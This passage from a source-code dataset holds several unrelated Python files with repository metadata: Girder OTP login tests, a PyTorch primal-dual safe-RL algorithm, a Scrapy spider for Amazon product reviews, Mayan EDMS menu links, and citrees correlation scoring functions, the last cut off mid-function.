    # Re-verify the same token, which should fail
    # The "server" fixture is necessary for this to work
    with pytest.raises(AccessException):
        User().verifyOtp(user, otpToken)
def testAuthenticateWithOtp(user):
    """authenticate requires a token iff OTP is enabled for the user."""
    # Providing an unnecessary token should fail
    with pytest.raises(AccessException):
        User().authenticate('user', 'password', '123456')
    # Enable OTP and save user
    otpUris = User().initializeOtp(user)
    user['otp']['enabled'] = True
    User().save(user)
    # Providing no token should now fail
    with pytest.raises(AccessException):
        User().authenticate('user', 'password')
    # Generate a valid token
    otpToken = _tokenFromTotpUri(otpUris['totpUri'])
    # Authenticate successfully with the valid token
    User().authenticate('user', 'password', otpToken)
def testAuthenticateWithOtpConcatenated(user):
    """With otpToken=True, the token is parsed off the end of the password."""
    # Non-OTP-user authentication should still succeed with "otpToken=True"
    User().authenticate('user', 'password', True)
    # Enable OTP and save user
    otpUris = User().initializeOtp(user)
    user['otp']['enabled'] = True
    User().save(user)
    # Authentication should now fail
    with pytest.raises(AccessException):
        User().authenticate('user', 'password', True)
    # Generate a valid token
    otpToken = _tokenFromTotpUri(otpUris['totpUri'])
    # Authenticate successfully with the valid token
    User().authenticate('user', 'password' + otpToken, True)
def testOtpApiWorkflow(server, user):
    """End-to-end REST workflow: initialize, finalize, login with, and
    disable OTP, covering the error paths at each stage."""
    # Try to finalize OTP before it's been initialized
    resp = server.request(
        path='/user/%s/otp' % user['_id'], method='PUT', user=user,
        additionalHeaders=[('Girder-OTP', '123456')])
    # This should fail cleanly
    assertStatus(resp, 400)
    assert 'not initialized' in resp.json['message']
    # Try to disable OTP before it's been enabled
    resp = server.request(path='/user/%s/otp' % user['_id'], method='DELETE', user=user)
    # This should fail cleanly
    assertStatus(resp, 400)
    assert 'not enabled' in resp.json['message']
    # Initialize OTP
    resp = server.request(path='/user/%s/otp' % user['_id'], method='POST', user=user)
    assertStatusOk(resp)
    # Save the URI
    totpUri = resp.json['totpUri']
    # Test the logic for server hostname as OTP URI issuer
    assert 'issuer=127.0.0.1' in totpUri
    # Login without an OTP
    resp = server.request(path='/user/authentication', method='GET', basicAuth='user:password')
    # Since OTP has not been finalized, this should still succeed
    assertStatusOk(resp)
    # Finalize without an OTP
    resp = server.request(
        path='/user/%s/otp' % user['_id'], method='PUT', user=user)
    assertStatus(resp, 400)
    assert 'Girder-OTP' in resp.json['message']
    # Finalize with an invalid OTP
    resp = server.request(
        path='/user/%s/otp' % user['_id'], method='PUT', user=user,
        additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri, False))])
    assertStatus(resp, 403)
    assert 'validation failed' in resp.json['message']
    # Finalize with a valid OTP
    resp = server.request(
        path='/user/%s/otp' % user['_id'], method='PUT', user=user,
        additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri))])
    assertStatusOk(resp)
    # The valid token from this time period was used to finalize OTP; to prevent having to wait for
    # the next time period, flush the rateLimitBuffer
    from girder.utility._cache import rateLimitBuffer
    rateLimitBuffer.invalidate()
    # Login without an OTP
    resp = server.request(path='/user/authentication', method='GET', basicAuth='user:password')
    assertStatus(resp, 401)
    assert 'Girder-OTP' in resp.json['message']
    # Login with an invalid OTP
    resp = server.request(
        path='/user/authentication', method='GET', basicAuth='user:password',
        additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri, False))])
    assertStatus(resp, 401)
    assert 'Token did not match' in resp.json['message']
    # Login with a valid OTP
    resp = server.request(
        path='/user/authentication', method='GET', basicAuth='user:password',
        additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri))])
    assertStatusOk(resp)
    # Disable OTP
    resp = server.request(path='/user/%s/otp' % user['_id'], method='DELETE', user=user)
    assertStatusOk(resp)
cf1fe7a14625d2db9b7aa3fc34ffda13a4a03d1f | 6,549 | py | Python | rl_safety_algorithms/algs/pdo/pdo.py | liuzuxin/RL-Safety-Algorithms | 2575225b1ea8ce12e1e13f7a81f8dda7b4189708 | [
"MIT"
] | 4 | 2021-09-05T17:49:02.000Z | 2021-12-22T03:13:39.000Z | rl_safety_algorithms/algs/pdo/pdo.py | liuzuxin/RL-Safety-Algorithms | 2575225b1ea8ce12e1e13f7a81f8dda7b4189708 | [
"MIT"
] | null | null | null | rl_safety_algorithms/algs/pdo/pdo.py | liuzuxin/RL-Safety-Algorithms | 2575225b1ea8ce12e1e13f7a81f8dda7b4189708 | [
"MIT"
] | 2 | 2021-09-05T17:49:07.000Z | 2021-11-30T17:36:30.000Z | """ PyTorch implementation of the Primal Dual Optimization (PDO) algorithm.
Author: Sven Gronauer (sven.gronauer@tum.de)
Created: 28.10.2020
Updated: --
inspired by:
Joshua Achiam, David Held, Aviv Tamar, Peter Abbeel
Constrained Policy Optimization
ICML 2017
also see:
Yinlam Chow, Mohammad Ghavamzadeh, Lucas Janson, and Marco Pavone
Risk-constrained reinforcement learning with percentile risk criteria
J. Mach. Learn. Res. 2017
"""
import numpy as np
from torch import optim
import torch
from rl_safety_algorithms.algs.cpo.cpo import CPOAlgorithm
from rl_safety_algorithms.algs.core import ConstrainedPolicyGradientAlgorithm
from rl_safety_algorithms.algs.npg.npg import NaturalPolicyGradientAlgorithm
from rl_safety_algorithms.algs.trpo.trpo import TRPOAlgorithm
import rl_safety_algorithms.algs.utils as U
from rl_safety_algorithms.common import utils
import rl_safety_algorithms.common.mpi_tools as mpi_tools
| 38.523529 | 85 | 0.626661 | """ PyTorch implementation of the Primal Dual Optimization (PDO) algorithm.
Author: Sven Gronauer (sven.gronauer@tum.de)
Created: 28.10.2020
Updated: --
inspired by:
Joshua Achiam, David Held, Aviv Tamar, Peter Abbeel
Constrained Policy Optimization
ICML 2017
also see:
Yinlam Chow, Mohammad Ghavamzadeh, Lucas Janson, and Marco Pavone
Risk-constrained reinforcement learning with percentile risk criteria
J. Mach. Learn. Res. 2017
"""
import numpy as np
from torch import optim
import torch
from rl_safety_algorithms.algs.cpo.cpo import CPOAlgorithm
from rl_safety_algorithms.algs.core import ConstrainedPolicyGradientAlgorithm
from rl_safety_algorithms.algs.npg.npg import NaturalPolicyGradientAlgorithm
from rl_safety_algorithms.algs.trpo.trpo import TRPOAlgorithm
import rl_safety_algorithms.algs.utils as U
from rl_safety_algorithms.common import utils
import rl_safety_algorithms.common.mpi_tools as mpi_tools
class PrimalDualOptimizationAlgorithm(CPOAlgorithm,
                                      ConstrainedPolicyGradientAlgorithm):
    """Primal Dual Optimization (PDO).

    Reuses the CPO machinery but takes a natural-gradient step on the
    Lagrangian-penalized objective: the search direction is built from
    ``g - lambda * b``, where ``g`` is the reward-objective gradient,
    ``b`` the cost-objective gradient, and ``lambda`` the learned
    Lagrange multiplier from ConstrainedPolicyGradientAlgorithm.
    """

    def __init__(
            self,
            alg: str = 'pdo',
            cost_limit: float = 25.,
            lagrangian_multiplier_init: float = 0.001,
            lambda_optimizer: str = 'Adam',
            lambda_lr: float = 0.001,
            **kwargs
    ):
        """Set up CPO internals, then the Lagrange-multiplier machinery."""
        CPOAlgorithm.__init__(
            self,
            alg=alg,
            cost_limit=cost_limit,
            lagrangian_multiplier_init=lagrangian_multiplier_init,
            lambda_lr=lambda_lr,
            lambda_optimizer=lambda_optimizer,
            **kwargs
        )
        assert self.alg == 'pdo'  # sanity check of argument passing
        ConstrainedPolicyGradientAlgorithm.__init__(
            self,
            cost_limit=cost_limit,
            use_lagrangian_penalty=True,  # todo: this param might be of no relevance
            lagrangian_multiplier_init=lagrangian_multiplier_init,
            lambda_lr=lambda_lr,
            lambda_optimizer=lambda_optimizer
        )

    def algorithm_specific_logs(self):
        """Log PDO-specific metrics on top of the NPG ones."""
        NaturalPolicyGradientAlgorithm.algorithm_specific_logs(self)
        self.logger.log_tabular('Misc/cost_gradient_norm')
        self.logger.log_tabular('LagrangeMultiplier',
                                self.lagrangian_multiplier.item())

    def update(self):
        """Update the Lagrange multiplier from the measured episode costs,
        then run the inherited policy/value update."""
        # Note that logger already uses MPI statistics across all processes..
        ep_costs = self.logger.get_stats('EpCosts')[0]
        # First update Lagrange multiplier parameter
        self.update_lagrange_multiplier(ep_costs)
        super().update()

    def update_policy_net(self, data):
        """One policy update: build the penalized direction g - lambda*b,
        solve for the natural-gradient step via conjugate gradients, adjust
        it with ``adjust_step_direction`` (inherited), apply it, and log."""
        # Get loss and info values before update
        theta_old = U.get_flat_params_from(self.ac.pi.net)
        self.pi_optimizer.zero_grad()
        loss_pi, pi_info = self.compute_loss_pi(data=data)
        self.loss_pi_before = loss_pi.item()
        self.loss_v_before = self.compute_loss_v(data['obs'],
                                                 data['target_v']).item()
        self.loss_c_before = self.compute_loss_c(data['obs'],
                                                 data['target_c']).item()
        # get prob. distribution before updates
        p_dist = self.ac.pi.dist(data['obs'])
        # Train policy with multiple steps of gradient descent
        loss_pi.backward()
        # average grads across MPI processes
        mpi_tools.mpi_avg_grads(self.ac.pi.net)
        g_flat = U.get_flat_gradients_from(self.ac.pi.net)
        g_flat *= -1  # flip sign since policy_loss = -(ratio * adv)
        # get the policy cost performance gradient b (flat as vector)
        self.pi_optimizer.zero_grad()
        loss_cost, _ = self.compute_loss_cost_performance(data=data)
        loss_cost.backward()
        # average grads across MPI processes
        mpi_tools.mpi_avg_grads(self.ac.pi.net)
        self.loss_pi_cost_before = loss_cost.item()
        b_flat = U.get_flat_gradients_from(self.ac.pi.net)
        # Lagrangian-penalized direction, then natural gradient via CG.
        p = g_flat - self.lagrangian_multiplier * b_flat
        x = U.conjugate_gradients(self.Fvp, p, self.cg_iters)
        assert torch.isfinite(x).all()
        pHp = torch.dot(x, self.Fvp(x))  # equivalent to : p^T x
        assert pHp.item() >= 0, 'No negative values.'
        # perform descent direction: scale so the step satisfies the KL bound
        eps = 1.0e-8
        alpha = torch.sqrt(2 * self.target_kl / (pHp + eps))
        step_direction = alpha * x
        assert torch.isfinite(step_direction).all()
        ep_costs = self.logger.get_stats('EpCosts')[0]
        # NOTE(review): `c` is computed but never used below -- confirm
        # whether it was meant to feed adjust_step_direction (as in CPO).
        c = ep_costs - self.cost_limit
        c /= (self.logger.get_stats('EpLen')[0] + eps)  # rescale
        # determine step direction and apply SGD step after grads were set
        final_step_dir, accept_step = self.adjust_step_direction(
            step_dir=step_direction,
            g_flat=g_flat,
            p_dist=p_dist,
            data=data
        )
        # update actor network parameters
        new_theta = theta_old + final_step_dir
        U.set_param_values_to_model(self.ac.pi.net, new_theta)
        with torch.no_grad():
            q_dist = self.ac.pi.dist(data['obs'])
            kl = torch.distributions.kl.kl_divergence(p_dist,
                                                      q_dist).mean().item()
            loss_pi, pi_info = self.compute_loss_pi(data=data)
        self.logger.store(**{
            'Values/Adv': data['act'].numpy(),
            'Entropy': pi_info['ent'],
            'KL': kl,
            'PolicyRatio': pi_info['ratio'],
            'Loss/Pi': self.loss_pi_before,
            'Loss/DeltaPi': loss_pi.item() - self.loss_pi_before,
            'Misc/AcceptanceStep': accept_step,
            'Misc/Alpha': alpha.item(),
            'Misc/StopIter': 1,
            'Misc/FinalStepNorm': final_step_dir.norm().item(),
            'Misc/xHx': pHp.item(),
            'Misc/gradient_norm': torch.norm(g_flat).item(),
            'Misc/cost_gradient_norm': torch.norm(b_flat).item(),
            'Misc/H_inv_g': x.norm().item(),
        })
def get_alg(env_id, **kwargs) -> PrimalDualOptimizationAlgorithm:
    """Instantiate a PDO algorithm for *env_id*, forwarding extra kwargs."""
    return PrimalDualOptimizationAlgorithm(env_id=env_id, **kwargs)
def learn(env_id,
          **kwargs
          ) -> tuple:
    """Train PDO on ``env_id`` and return ``(actor_critic, env)``.

    Keyword arguments override the registered defaults for the 'pdo' alg.
    """
    defaults = utils.get_defaults_kwargs(alg='pdo', env_id=env_id)
    defaults.update(**kwargs)
    alg = PrimalDualOptimizationAlgorithm(
        env_id=env_id,
        **defaults
    )
    ac, env = alg.learn()
    return ac, env
| 5,312 | 105 | 176 |
00a9e5f58342a9bccd8e67ac41aec89b1b16e559 | 1,048 | py | Python | AmazonProductReviewScraping/reviews/spiders/productReviews.py | pranav0904/Amazon-Product-Review | 76a39c667642c98f2c4f240fda5fcf92a7fa5cf8 | [
"MIT"
] | 1 | 2021-12-14T08:39:16.000Z | 2021-12-14T08:39:16.000Z | AmazonProductReviewScraping/reviews/spiders/productReviews.py | pranav0904/Amazon-Product-Review | 76a39c667642c98f2c4f240fda5fcf92a7fa5cf8 | [
"MIT"
] | null | null | null | AmazonProductReviewScraping/reviews/spiders/productReviews.py | pranav0904/Amazon-Product-Review | 76a39c667642c98f2c4f240fda5fcf92a7fa5cf8 | [
"MIT"
] | 1 | 2021-12-02T16:51:34.000Z | 2021-12-02T16:51:34.000Z | import scrapy
from scrapy import Request
import scraper_helper as sh
from scrapy.selector import Selector
review_url = 'https://www.amazon.com/product-reviews/{}'
asin_list = ['B08CVSL4K5'] #Roborock
| 33.806452 | 116 | 0.59542 | import scrapy
from scrapy import Request
import scraper_helper as sh
from scrapy.selector import Selector
# URL template for an ASIN's review-listing page.
review_url = 'https://www.amazon.com/product-reviews/{}'
asin_list = ['B08CVSL4K5']  # Roborock
class ProductreviewsSpider(scrapy.Spider):
    """Scrape Amazon product reviews for every ASIN in ``asin_list``."""
    name = 'productReviews'

    def start_requests(self):
        """Yield the first review-listing page for each configured ASIN."""
        for asin in asin_list:
            url = review_url.format(asin)
            yield scrapy.Request(url)

    def parse(self, response):
        """Yield one item per review on the page, then follow pagination."""
        for review in response.css('[data-hook = "review"]'):
            item = {
                'Rating': review.css('[data-hook = "review-star-rating"] ::text').get(),
                'Review_title': review.css('[data-hook = "review-title"] span ::text').get(),
                'Product_review': review.xpath('normalize-space(.//*[@data-hook="review-body"]/span/text())').get(),
            }
            yield item
        # Follow the "Next page" link once per page. The original yielded
        # this request inside the per-review loop (one duplicate pagination
        # request per review) and queried it off `review` instead of the
        # whole response.
        next_page = response.xpath('//a[text() = "Next page"]/@href').get()
        if next_page:
            yield scrapy.Request(response.urljoin(next_page))
| 715 | 107 | 23 |
a193ad0ca2236f916cfc3ad918e5d50bc9873323 | 3,485 | py | Python | mayan/apps/metadata/links.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 2 | 2021-09-12T19:41:19.000Z | 2021-09-12T19:41:20.000Z | mayan/apps/metadata/links.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 37 | 2021-09-13T01:00:12.000Z | 2021-10-02T03:54:30.000Z | mayan/apps/metadata/links.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:17:30.000Z | 2021-09-22T13:17:30.000Z | from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.navigation.classes import Link
from .icons import (
icon_document_metadata_add, icon_document_metadata_edit,
icon_document_metadata_remove, icon_document_metadata_view,
icon_metadata_type_create, icon_metadata_type_delete,
icon_metadata_type_document_type_list, icon_metadata_type_edit,
icon_metadata_type_list, icon_document_type_metadata_type_list
)
from .permissions import (
permission_document_metadata_add, permission_document_metadata_edit,
permission_document_metadata_remove, permission_document_metadata_view,
permission_metadata_type_create, permission_metadata_type_delete,
permission_metadata_type_edit, permission_metadata_type_view
)
# --- Per-document metadata links -------------------------------------------
link_metadata_add = Link(
    args='object.pk', icon=icon_document_metadata_add,
    permissions=(permission_document_metadata_add,), text=_('Add metadata'),
    view='metadata:metadata_add',
)
link_metadata_edit = Link(
    args='object.pk', icon=icon_document_metadata_edit,
    permissions=(permission_document_metadata_edit,),
    text=_('Edit metadata'), view='metadata:metadata_edit'
)
# Multi-document variants carry no `permissions` here; access is checked
# per selected document by the target views.
link_metadata_multiple_add = Link(
    icon=icon_document_metadata_add, text=_('Add metadata'),
    view='metadata:metadata_multiple_add'
)
link_metadata_multiple_edit = Link(
    icon=icon_document_metadata_edit, text=_('Edit metadata'),
    view='metadata:metadata_multiple_edit'
)
link_metadata_multiple_remove = Link(
    icon=icon_document_metadata_remove, text=_('Remove metadata'),
    view='metadata:metadata_multiple_remove'
)
link_metadata_remove = Link(
    args='object.pk', icon=icon_document_metadata_remove,
    permissions=(permission_document_metadata_remove,),
    text=_('Remove metadata'), view='metadata:metadata_remove',
)
link_metadata_view = Link(
    args='resolved_object.pk', icon=icon_document_metadata_view,
    permissions=(permission_document_metadata_view,), text=_('Metadata'),
    view='metadata:metadata_view',
)
# --- Document type <-> metadata type relationship links --------------------
link_document_type_metadata_type_relationship = Link(
    args='resolved_object.pk',
    icon=icon_document_type_metadata_type_list,
    permissions=(permission_document_type_edit,),
    text=_('Metadata types'), view='metadata:document_type_metadata_type_relationship',
)
link_metadata_type_document_type_relationship = Link(
    args='resolved_object.pk',
    icon=icon_metadata_type_document_type_list,
    permissions=(permission_document_type_edit,),
    text=_('Document types'), view='metadata:metadata_type_document_type_relationship',
)
# --- Metadata type setup links ---------------------------------------------
link_metadata_type_create = Link(
    icon=icon_metadata_type_create,
    permissions=(permission_metadata_type_create,), text=_('Create new'),
    view='metadata:metadata_type_create'
)
link_metadata_type_delete = Link(
    args='object.pk', icon=icon_metadata_type_delete,
    permissions=(permission_metadata_type_delete,),
    tags='dangerous', text=_('Delete'), view='metadata:metadata_type_delete',
)
link_metadata_type_edit = Link(
    args='object.pk', icon=icon_metadata_type_edit,
    permissions=(permission_metadata_type_edit,),
    text=_('Edit'), view='metadata:metadata_type_edit'
)
link_metadata_type_list = Link(
    icon=icon_metadata_type_list,
    permissions=(permission_metadata_type_view,),
    text=_('Metadata types'), view='metadata:metadata_type_list'
)
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.navigation.classes import Link
from .icons import (
icon_document_metadata_add, icon_document_metadata_edit,
icon_document_metadata_remove, icon_document_metadata_view,
icon_metadata_type_create, icon_metadata_type_delete,
icon_metadata_type_document_type_list, icon_metadata_type_edit,
icon_metadata_type_list, icon_document_type_metadata_type_list
)
from .permissions import (
permission_document_metadata_add, permission_document_metadata_edit,
permission_document_metadata_remove, permission_document_metadata_view,
permission_metadata_type_create, permission_metadata_type_delete,
permission_metadata_type_edit, permission_metadata_type_view
)
link_metadata_add = Link(
args='object.pk', icon=icon_document_metadata_add,
permissions=(permission_document_metadata_add,), text=_('Add metadata'),
view='metadata:metadata_add',
)
link_metadata_edit = Link(
args='object.pk', icon=icon_document_metadata_edit,
permissions=(permission_document_metadata_edit,),
text=_('Edit metadata'), view='metadata:metadata_edit'
)
link_metadata_multiple_add = Link(
icon=icon_document_metadata_add, text=_('Add metadata'),
view='metadata:metadata_multiple_add'
)
link_metadata_multiple_edit = Link(
icon=icon_document_metadata_edit, text=_('Edit metadata'),
view='metadata:metadata_multiple_edit'
)
link_metadata_multiple_remove = Link(
icon=icon_document_metadata_remove, text=_('Remove metadata'),
view='metadata:metadata_multiple_remove'
)
link_metadata_remove = Link(
args='object.pk', icon=icon_document_metadata_remove,
permissions=(permission_document_metadata_remove,),
text=_('Remove metadata'), view='metadata:metadata_remove',
)
link_metadata_view = Link(
args='resolved_object.pk', icon=icon_document_metadata_view,
permissions=(permission_document_metadata_view,), text=_('Metadata'),
view='metadata:metadata_view',
)
link_document_type_metadata_type_relationship = Link(
args='resolved_object.pk',
icon=icon_document_type_metadata_type_list,
permissions=(permission_document_type_edit,),
text=_('Metadata types'), view='metadata:document_type_metadata_type_relationship',
)
link_metadata_type_document_type_relationship = Link(
args='resolved_object.pk',
icon=icon_metadata_type_document_type_list,
permissions=(permission_document_type_edit,),
text=_('Document types'), view='metadata:metadata_type_document_type_relationship',
)
link_metadata_type_create = Link(
icon=icon_metadata_type_create,
permissions=(permission_metadata_type_create,), text=_('Create new'),
view='metadata:metadata_type_create'
)
link_metadata_type_delete = Link(
args='object.pk', icon=icon_metadata_type_delete,
permissions=(permission_metadata_type_delete,),
tags='dangerous', text=_('Delete'), view='metadata:metadata_type_delete',
)
link_metadata_type_edit = Link(
args='object.pk', icon=icon_metadata_type_edit,
permissions=(permission_metadata_type_edit,),
text=_('Edit'), view='metadata:metadata_type_edit'
)
link_metadata_type_list = Link(
icon=icon_metadata_type_list,
permissions=(permission_metadata_type_view,),
text=_('Metadata types'), view='metadata:metadata_type_list'
)
| 0 | 0 | 0 |
4e5a5ed27eea5e994d2324b6c0408176e8371053 | 15,744 | py | Python | citrees/scorers.py | m0hashi/citrees | e7d4866109ce357d5d67cffa450604567f7b469e | [
"MIT"
] | null | null | null | citrees/scorers.py | m0hashi/citrees | e7d4866109ce357d5d67cffa450604567f7b469e | [
"MIT"
] | null | null | null | citrees/scorers.py | m0hashi/citrees | e7d4866109ce357d5d67cffa450604567f7b469e | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function
import ctypes
from numba import njit
import numpy as np
from os.path import dirname, join
import pandas as pd
from scipy.stats import rankdata as rank
from sklearn.feature_selection import mutual_info_classif
# from externals.six.moves import range
#######################
"""CREATE C WRAPPERS"""
#######################
# Define constants for wrapping C functions
# SHARED_OBJECT_DIR = join(dirname(__file__), 'bin')
# Weighted distance correlation
# CFUNC_DCORS_PATH = join(SHARED_OBJECT_DIR, 'dcor.so')
# CFUNC_DCORS_DLL = ctypes.CDLL(CFUNC_DCORS_PATH)
# CFUNC_DCORS_DLL.wdcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# ctypes.POINTER(ctypes.c_double) # w
# )
# CFUNC_DCORS_DLL.wdcor.restype = ctypes.c_double
# Unweighted distance correlation
# CFUNC_DCORS_DLL.dcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# )
# CFUNC_DCORS_DLL.dcor.restype = ctypes.c_double
###################################
"""FEATURE SELECTORS: CONTINUOUS"""
###################################
@njit(cache=True, nogil=True, fastmath=True)
def pcor(x, y):
    """Pearson product-moment correlation between two 1d arrays.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements
    y : 1d array-like
        Array of n elements

    Returns
    -------
    cor : float
        Pearson correlation; 0.0 when either input has zero variance
    """
    # Flatten any higher-dimensional input down to 1d
    if x.ndim > 1: x = x.ravel()
    if y.ndim > 1: y = y.ravel()

    n = len(x)
    sum_x, sum_y = 0.0, 0.0
    sum_xx, sum_yy, sum_xy = 0.0, 0.0, 0.0

    # Single pass accumulating the raw moments
    for idx in range(n):
        xv = x[idx]
        yv = y[idx]
        sum_x += xv
        sum_xx += xv*xv
        sum_y += yv
        sum_yy += yv*yv
        sum_xy += xv*yv

    # Covariance and variance terms, each scaled by n
    covariance = n*sum_xy - sum_x*sum_y
    var_x = n*sum_xx - sum_x*sum_x
    var_y = n*sum_yy - sum_y*sum_y

    # A constant input has zero variance; the correlation is undefined,
    # so report 0 instead of dividing by zero
    if var_x == 0.0 or var_y == 0.0:
        return 0.0
    return covariance/np.sqrt(var_x*var_y)
def cca(X, Y):
    """Largest canonical correlation between two matrices.

    Parameters
    ----------
    X : 2d array-like
        Matrix with n samples in rows
    Y : 2d array-like
        Matrix with n samples in rows

    Returns
    -------
    cor : float
        Largest canonical correlation between X and Y, clipped to [0, 1].
        0.0 when either matrix centers to rank zero (e.g. constant
        columns), since no correlation is defined in that case.
    """
    # Columns for X and Y
    Xp = X.shape[1]
    Yp = Y.shape[1]

    # Center X and Y and then QR decomposition
    X = X-X.mean(axis=0)
    Y = Y-Y.mean(axis=0)
    Qx, Rx = np.linalg.qr(X)
    Qy, Ry = np.linalg.qr(Y)

    # Check rank for X; drop linearly dependent columns if rank deficient
    rankX = np.linalg.matrix_rank(Rx)
    if rankX == 0:
        # BUG FIX: previously returned the *list* [0.0] here while the
        # normal path returns a float, giving an inconsistent return type
        # (and [0.0] is truthy). Return a plain float instead.
        return 0.0
    elif rankX < Xp:
        Qx = Qx[:, 0:rankX]
        Rx = Rx[0:rankX, 0:rankX]

    # Check rank for Y; same treatment
    rankY = np.linalg.matrix_rank(Ry)
    if rankY == 0:
        return 0.0
    elif rankY < Yp:
        Qy = Qy[:, 0:rankY]
        Ry = Ry[0:rankY, 0:rankY]

    # Singular values of Qx'Qy are the canonical correlations; clip the
    # top one into [0, 1] to guard against round-off
    QxQy = np.dot(Qx.T, Qy)
    _, cor, _ = np.linalg.svd(QxQy)
    return np.clip(cor[0], 0, 1)
def rdc(X, Y, k=10, s=1.0/6.0, f=np.sin):
    """Randomized dependence coefficient between X and Y.

    Rank (copula) transforms both inputs, pushes them through k random
    nonlinear projections, and returns the largest canonical correlation
    of the projected features.

    Parameters
    ----------
    X : 2d array-like
        Array of n elements
    Y : 2d array-like
        Array of n elements
    k : int
        Number of random projections
    s : float
        Variance of the Gaussian random projection weights
    f : function
        Non-linear function applied to the projections

    Returns
    -------
    cor : float
        Randomized dependence coefficient between X and Y
    """
    # Promote 1d inputs to column vectors
    if X.ndim < 2: X = X.reshape(-1, 1)
    if Y.ndim < 2: Y = Y.reshape(-1, 1)

    n_x, p_x = X.shape
    n_y, p_y = Y.shape

    # Copula transform of X, augmented with a bias column, then projected
    # through Gaussian random weights
    ones_x = np.ones((n_x, 1))
    cop_x = np.array([rank(X[:, col])/float(n_x) for col in range(p_x)]).reshape(n_x, p_x)
    cop_x = (s/cop_x.shape[1])*np.column_stack([cop_x, ones_x])
    cop_x = cop_x.dot(np.random.randn(cop_x.shape[1], k))

    # Identical treatment for Y
    ones_y = np.ones((n_y, 1))
    cop_y = np.array([rank(Y[:, col])/float(n_y) for col in range(p_y)]).reshape(n_y, p_y)
    cop_y = (s/cop_y.shape[1])*np.column_stack([cop_y, ones_y])
    cop_y = cop_y.dot(np.random.randn(cop_y.shape[1], k))

    # Nonlinearity plus bias column, then largest canonical correlation
    proj_x = np.column_stack([f(cop_x), ones_x])
    proj_y = np.column_stack([f(cop_y), ones_y])
    return cca(proj_x, proj_y)
@njit(cache=True, nogil=True, fastmath=True)
def cca_fast(X, Y):
    """Largest canonical correlation (nopython-friendly variant).

    Parameters
    ----------
    X : 2d array-like
        Matrix with n samples in rows
    Y : 2d array-like
        Matrix with n samples in rows

    Returns
    -------
    cor : 1d array
        Canonical correlations between X and Y; array([0.0]) when either
        matrix centers to rank zero
    """
    # Number of columns in each input
    p_x = X.shape[1]
    p_y = Y.shape[1]

    # Column means computed explicitly, one column at a time
    mean_x = np.array([np.mean(X[:, col]) for col in range(p_x)])
    mean_y = np.array([np.mean(Y[:, col]) for col in range(p_y)])

    # Center both matrices and take QR decompositions
    X = X - mean_x
    Y = Y - mean_y
    Qx, Rx = np.linalg.qr(X)
    Qy, Ry = np.linalg.qr(Y)

    # Degenerate X: bail out; rank deficient X: drop dependent columns
    rank_x = np.linalg.matrix_rank(Rx)
    if rank_x == 0:
        return np.array([0.0])
    elif rank_x < p_x:
        Qx = Qx[:, 0:rank_x]
        Rx = Rx[0:rank_x, 0:rank_x]

    # Same treatment for Y
    rank_y = np.linalg.matrix_rank(Ry)
    if rank_y == 0:
        return np.array([0.0])
    elif rank_y < p_y:
        Qy = Qy[:, 0:rank_y]
        Ry = Ry[0:rank_y, 0:rank_y]

    # Singular values of Qx'Qy are the canonical correlations
    _, cor, _ = np.linalg.svd(np.dot(Qx.T, Qy))
    return cor
@njit(cache=True, nogil=True, fastmath=True)
def rdc_fast(x, y, k=10, s=1.0/6.0, f=np.sin):
    """Randomized dependence coefficient (nopython-friendly variant).

    Parameters
    ----------
    x : 1d array-like
        Array of n elements
    y : 1d array-like
        Array of n elements
    k : int
        Number of random projections
    s : float
        Variance of the Gaussian random projection weights
    f : function
        Non-linear function applied to the projections

    Returns
    -------
    cor : float
        Randomized dependence coefficient between x and y, clipped to [0, 1]
    """
    # Shape of random vectors
    xn = x.shape[0]
    yn = y.shape[0]

    # Rank transform. BUG FIX: the previous code used np.argsort(x) directly
    # as the rank vector, but argsort yields the *sorting permutation*, which
    # is the inverse of the rank permutation -- so element i was paired with
    # the wrong rank value. Inverting the permutation gives each element its
    # 0-based rank (ties broken by position, unlike the average ranks used by
    # rdc(); acceptable for this fast approximation).
    order_x = np.argsort(x)
    rank_x = np.empty(xn)
    for i in range(xn):
        rank_x[order_x[i]] = i
    order_y = np.argsort(y)
    rank_y = np.empty(yn)
    for i in range(yn):
        rank_y[order_y[i]] = i

    # Copula transform plus bias column, then k random Gaussian projections
    x_ones = np.ones((xn, 1))
    X_ = rank_x/float(xn)
    X_ = 0.5*s*np.column_stack((X_, x_ones))
    X_ = np.dot(X_, np.random.randn(2, k))

    y_ones = np.ones((yn, 1))
    Y_ = rank_y/float(yn)
    Y_ = 0.5*s*np.column_stack((Y_, y_ones))
    Y_ = np.dot(Y_, np.random.randn(2, k))

    # Nonlinearity, bias column, then largest canonical correlation
    X_ = np.column_stack((f(X_), x_ones))
    Y_ = np.column_stack((f(Y_), y_ones))
    cor = cca_fast(X_, Y_)[0]

    # Clip round-off excursions into [0, 1]
    if cor < 0.0:
        return 0.0
    elif cor > 1.0:
        return 1.0
    else:
        return cor
@njit(cache=True, nogil=True, fastmath=True)
def py_wdcor(x, y, weights):
    """Weighted distance correlation between two 1d arrays.

    Python port of the C function; written with flat condensed distance
    vectors and explicit accumulators so it stays Numba (nopython) friendly.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements
    y : 1d array-like
        Array of n elements
    weights : 1d array-like
        Weight vector that sums to 1

    Returns
    -------
    dcor : float
        Weighted distance correlation; 0 when any variance term degenerates
        (e.g. a constant input)
    """
    # Define initial variables. Edx/Edy are weighted row sums of each
    # distance matrix; DMX/DMY hold the condensed upper triangle (s pairs).
    n = x.shape[0]
